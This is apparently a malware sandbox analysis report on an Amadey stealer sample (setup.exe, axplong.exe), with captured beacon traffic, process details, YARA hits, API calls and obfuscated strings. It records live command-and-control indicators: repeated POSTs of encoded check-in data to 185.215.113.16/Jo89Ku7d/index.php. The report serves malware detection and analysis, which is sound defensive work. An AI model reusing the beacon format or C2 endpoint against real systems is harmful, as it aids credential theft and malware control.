                    Data Ascii: st=s
                    Jul 26, 2024 21:04:00.194206953 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    78 | 192.168.2.7 | 49784 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:04:00.202991009 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:04:00.958013058 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    79 | 192.168.2.7 | 49785 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:04:02.261363029 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:03.035535097 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    80 | 192.168.2.7 | 49786 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:04:03.049567938 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:04:03.874830008 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    81 | 192.168.2.7 | 49787 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:04:04.007189989 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:04.806941986 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0



                    Target ID:0
                    Start time:15:01:56
                    Start date:26/07/2024
                    Path:C:\Users\user\Desktop\setup.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\setup.exe"
                    Imagebase:0xc50000
                    File size:1'939'456 bytes
                    MD5 hash:C6620FE2690605F20F5B9C970E8130C6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1247561021.0000000004610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1335650088.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:4
                    Start time:15:02:02
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Imagebase:0xa70000
                    File size:1'939'456 bytes
                    MD5 hash:C6620FE2690605F20F5B9C970E8130C6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000004.00000002.1346668514.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000004.00000003.1306286454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 58%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    Target ID:13
                    Start time:16:32:00
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                    Imagebase:0xa70000
                    File size:1'939'456 bytes
                    MD5 hash:C6620FE2690605F20F5B9C970E8130C6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000003.1562495489.0000000004900000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                      Memory Dump Source
                      • Source File: 00000000.00000002.1336857295.0000000004820000.00000040.00001000.00020000.00000000.sdmp, Offset: 04820000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4820000_setup.jbxd

                      Execution Graph

                      Execution Coverage:9.3%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:6.2%
                      Total number of Nodes:601
                      Total number of Limit Nodes:41

                      Control-flow Graph

                      APIs
                      • InternetOpenW.WININET(00AC8D70,00000000,00000000,00000000,00000000), ref: 00A7BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A7BE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 00A7BE5A
                      • HttpSendRequestA.WININET(?,00000000), ref: 00A7BF1B
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00A7BFCD
                      • InternetCloseHandle.WININET(?), ref: 00A7C0A7
                      • InternetCloseHandle.WININET(?), ref: 00A7C0AF
                      • InternetCloseHandle.WININET(?), ref: 00A7C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$8P$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-3094775302
                      APIs
                        • Part of subcall function 00A87870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00A8795C
                        • Part of subcall function 00A87870: __Cnd_destroy_in_situ.LIBCPMT ref: 00A87968
                        • Part of subcall function 00A87870: __Mtx_destroy_in_situ.LIBCPMT ref: 00A87971
                        • Part of subcall function 00A7BD60: InternetOpenW.WININET(00AC8D70,00000000,00000000,00000000,00000000), ref: 00A7BDED
                        • Part of subcall function 00A7BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00A7BE11
                        • Part of subcall function 00A7BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00A7BE5A
                      • std::_Xinvalid_argument.LIBCPMT ref: 00A84EA2
                      Strings
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 6b29ae9790ca89605af81413c9cbf66dcc50dd174e29a7c1fa649f7ede552b6a
                      • Instruction ID: 00b1a672d1d1e83a40057cd96ec9eb4699d0b7155e1a45d6d119b4826c63463e
                      • Opcode Fuzzy Hash: 6b29ae9790ca89605af81413c9cbf66dcc50dd174e29a7c1fa649f7ede552b6a
                      • Instruction Fuzzy Hash: 1E230571E001549BEB19EB38CE8979DBB76AF85304F5481D8E009AB2D2EB359F84CF51

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node a75df0-a75eee; named API calls: RegOpenKeyExA, RegEnumValueW)
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 03fea88bb4051b9cf3d4753ff25a1a795e0cd42203d957b66e43df42c590ceec
                      • Instruction ID: 33c900e017b713d5f532c3750f6f0d96895aa98d895c9a50f317b5f42b4262de
                      • Opcode Fuzzy Hash: 03fea88bb4051b9cf3d4753ff25a1a795e0cd42203d957b66e43df42c590ceec
                      • Instruction Fuzzy Hash: C4E17D71900218ABEB29DFA4CD89BDEB779AF04304F5082D9E509A7291DB74AFC4CF51

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node a77d00-a77d82; named API calls: GetNativeSystemInfo)
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A77EA3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==$IR
                      • API String ID: 1721193555-4204238189
                      • Opcode ID: 6c1f0509027b59173fbb63021ae2616df947be210d3febf103406d9757d2f35a
                      • Instruction ID: bdd2a0bbd70ccafd2ead97be6b3555e5debda786084ea5fac07d21c202eebf7e
                      • Opcode Fuzzy Hash: 6c1f0509027b59173fbb63021ae2616df947be210d3febf103406d9757d2f35a
                      • Instruction Fuzzy Hash: 7AD1E871E00604ABDF14FB68CE5A3AD7771AB42310F54C299E41A6B3D2DB758E81CBD2

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node aa6e01-aa6e36; named API calls: GetFileType, GetFileInformationByHandle)
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00AA6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00AA6E7D
                      • __dosmaperr.LIBCMT ref: 00AA6F12
                        • Part of subcall function 00AA7177: __dosmaperr.LIBCMT ref: 00AA71AC
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: aea44c1bad9aa15f64fd1cf08ebe77578293f31a934912c2c409db0731ab0716
                      • Instruction ID: 8837604e71e283565e2d9a28ab912fd16dc413ba113761811ae00606c7a0da47
                      • Opcode Fuzzy Hash: aea44c1bad9aa15f64fd1cf08ebe77578293f31a934912c2c409db0731ab0716
                      • Instruction Fuzzy Hash: 9B412875900244AFDB24EFB5ED419AFBBF9EF8A300B14442DF956D3291EB31A904CB60

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node aad4f4-aad515; named API calls: RtlAllocateHeap)
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d1d4a2cb1ed37a76aa38ad65bc4cafe57fff8a5cb332d0b7130dd90e48b64bff
                      • Instruction ID: a0b18c31558b526406c520db0fbb4eea53ae8c0ed544650bb083be522dcaae8f
                      • Opcode Fuzzy Hash: d1d4a2cb1ed37a76aa38ad65bc4cafe57fff8a5cb332d0b7130dd90e48b64bff
                      • Instruction Fuzzy Hash: 7161F372D102158FDF25EFA8D9856EDBBB1EB57314F28411AE48BABAD0D7308C01CB61

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node a782b0-a78331; named API calls: GetNativeSystemInfo)
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00A78454
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 1a5d6feb0c1adf4a7d5a9543b39df160b670a3b82b81024211ada166beee72a9
                      • Instruction ID: 602d8d8d406381335b403a860ea3da2a6e58e5044cdecfd2adf5b3dacf605142
                      • Opcode Fuzzy Hash: 1a5d6feb0c1adf4a7d5a9543b39df160b670a3b82b81024211ada166beee72a9
                      • Instruction Fuzzy Hash: 39513C71D442089BEB14EF38CD497DDB775EB45310F50C2A9E808A72C1EF759E808BA1

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node a78a60-a78ab7; named API calls: GetTempPathA)
                      APIs
                      • GetTempPathA.KERNELBASE(00000104,?,007A9F3D,?,00000000), ref: 00A78AA7
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: PathTemp
                      • String ID:
                      • API String ID: 2920410445-0
                      • Opcode ID: d105add66c31dc9668dde9eba2dbb0378bced845b82e09f821a6f7800e2732c0
                      • Instruction ID: 9280aa6ea3228fcf9a2df53a6f685ab0fcf92a34e5e3f343554bc30b2840edbc
                      • Opcode Fuzzy Hash: d105add66c31dc9668dde9eba2dbb0378bced845b82e09f821a6f7800e2732c0
                      • Instruction Fuzzy Hash: 7C51D1719011589BEB29DB28CE897DDBB75EB85310F1082E9E40DA7281DB395F84CFA1

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node aa6c99-aa6ca5; named API calls: CreateFileW)
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a8f362010a52e5727966db2948d0f74064b488896cd5aefb54a04e35a230a05
                      • Instruction ID: b5e7506325309cb26fb48d38d128ce3e5a1eaf1dd398c4291d9f7bc53561912d
                      • Opcode Fuzzy Hash: 8a8f362010a52e5727966db2948d0f74064b488896cd5aefb54a04e35a230a05
                      • Instruction Fuzzy Hash: AC210772A056087BEB11BB64DD42BAF37299F43378F290310F9343B1D1DB705E059AA1

                      Control-flow Graph (graph not preserved; legend: Executed / Not Executed; first node aa6f71-aa6f87; named API calls: SystemTimeToTzSpecificLocalTime)
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00AA6FB3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0

                      Control-flow Graph

                      control_flow_graph 1530 aad6ef-aad6fa 1531 aad708-aad70e 1530->1531 1532 aad6fc-aad706 1530->1532 1534 aad710-aad711 1531->1534 1535 aad727-aad738 RtlAllocateHeap 1531->1535 1532->1531 1533 aad73c-aad747 call aa7443 1532->1533 1540 aad749-aad74b 1533->1540 1534->1535 1537 aad73a 1535->1537 1538 aad713-aad71a call aa9c81 1535->1538 1537->1540 1538->1533 1543 aad71c-aad725 call aa8cf9 1538->1543 1543->1533 1543->1535
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00AAA5ED,?,00AA74AE,?,00000000,?), ref: 00AAD731
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                      • API String ID: 0-214772295
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00A8CE82,?,?,?,?,00A8CEB7,?,?,?,?,?,?,00A8C42D,?,00000001), ref: 00A8CB33
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 0919108ff403e83479ba11f8857068e70a3d369af6f4337063085e13988f964a
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: 9A517A7020C6485BDF398B388D957BF67AA9F53300F18046ED442D76C2DB16DE45C752
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e8b36bc7fc1f8d1c9b37845a51e03a3553136a56448a67cfe5dea2689d417888
                      • Instruction ID: 41d457ef88dc7f7694b9efd10a030f94f80b7388e80692dbd426736994b39df7
                      • Opcode Fuzzy Hash: e8b36bc7fc1f8d1c9b37845a51e03a3553136a56448a67cfe5dea2689d417888
                      • Instruction Fuzzy Hash: A5224EB3F515144BDB4CCA9DDCA27EDB3E3AFD8214B0E803DA40AE3345EA79D9158A44
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59cd26ecebcc3604242d28ee9fec23bf8d3fb8d11816d5e79447c3312c6e628c
                      • Instruction ID: 8eda1e8bac5f1ff51023a7aee96aa3dde7e26fda19473063f3427fa418f13b4d
                      • Opcode Fuzzy Hash: 59cd26ecebcc3604242d28ee9fec23bf8d3fb8d11816d5e79447c3312c6e628c
                      • Instruction Fuzzy Hash: F7B17E31214608DFD715CF2CC486BA97BB4FF85364F258659E89ACF2A2C376E981CB40
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00A7247E
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: a58746427c3a4a88d5ecf45a1c1e082a940012ec32200c271174db70be194782
                      • Instruction ID: 9f4f35a1097fa477d1502bb7f6e28489149e1fc1ae2179cda3c5a654a22bae96
                      • Opcode Fuzzy Hash: a58746427c3a4a88d5ecf45a1c1e082a940012ec32200c271174db70be194782
                      • Instruction Fuzzy Hash: 0551BDB1E016058FDB19DFA9D8857AEBBF0FB18350F24856AD806EB2A0D7349D41CF50
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ae0dd4b086f2cf83f0c697960ad3aa3fd2c42918f9a070a6e7e01822036b2a3
                      • Instruction ID: 7ce433658e6685360c6bb5cd7eaa925c6bf952acbd4e6f4ce211fd02005a9479
                      • Opcode Fuzzy Hash: 3ae0dd4b086f2cf83f0c697960ad3aa3fd2c42918f9a070a6e7e01822036b2a3
                      • Instruction Fuzzy Hash: F751A4716083918FD319CF2D851563ABFE1BFDA200F098A9EE4DA87292D774DA44CBD1
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38623dbc4430b2ff40395ab0acf93160a5cd604c4e0d37213352643de0ddd41f
                      • Instruction ID: 2d933547bb2666770a9bbdcd6a3062500913e1f7c79c18a6650f1778c2574d7c
                      • Opcode Fuzzy Hash: 38623dbc4430b2ff40395ab0acf93160a5cd604c4e0d37213352643de0ddd41f
                      • Instruction Fuzzy Hash: 2D21B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f18ef6ec813dbe5f92cbb7a0488b742292b68170161e977ec498d2013b9aa98
                      • Instruction ID: a55157dfe8b223004a42e3195bea58aee899a804f21a23e48ac851656a38ec5f
                      • Opcode Fuzzy Hash: 8f18ef6ec813dbe5f92cbb7a0488b742292b68170161e977ec498d2013b9aa98
                      • Instruction Fuzzy Hash: 03117723F30C255A675C817D8C172BAA6D6DBD825071F533AD826EB384E994DE23D290
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: 3d798332d00412e4f2586ac7d505df7e22e169d2b07526189d3d079189d8d708
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: F011087B20114247D604872DC9F49F6A79EEAC5329B3C437AD0414B75BDE3BD9C5D900
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae9a08bd8344cf53e86c0f75ae56990a3a27e1aaa18873f047a42f9405c3b805
                      • Instruction ID: c13c146c10de935512d9eb78e5c5914ab8d8eb14a20647452e3c07381cef6e49
                      • Opcode Fuzzy Hash: ae9a08bd8344cf53e86c0f75ae56990a3a27e1aaa18873f047a42f9405c3b805
                      • Instruction Fuzzy Hash: A0E08C31191A086FCF267F14CA18A5D3B6EEB57348F188810F8144B261CB2AEC82CE80
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: bebf7f71a6327cff48772cbda625a98eb2eae92116f83ae07cc5ef50435f4542
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 41E0B672925228FBCB25DBD88A44D9AF2ECEB4AB50F554596B501D3291C370DF00C7D1
                      Strings
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-2390467879
                      • Opcode ID: 00f09f157acb21c240d65a6ced475cf1da23301fb865fb82383aa373c97c4c31
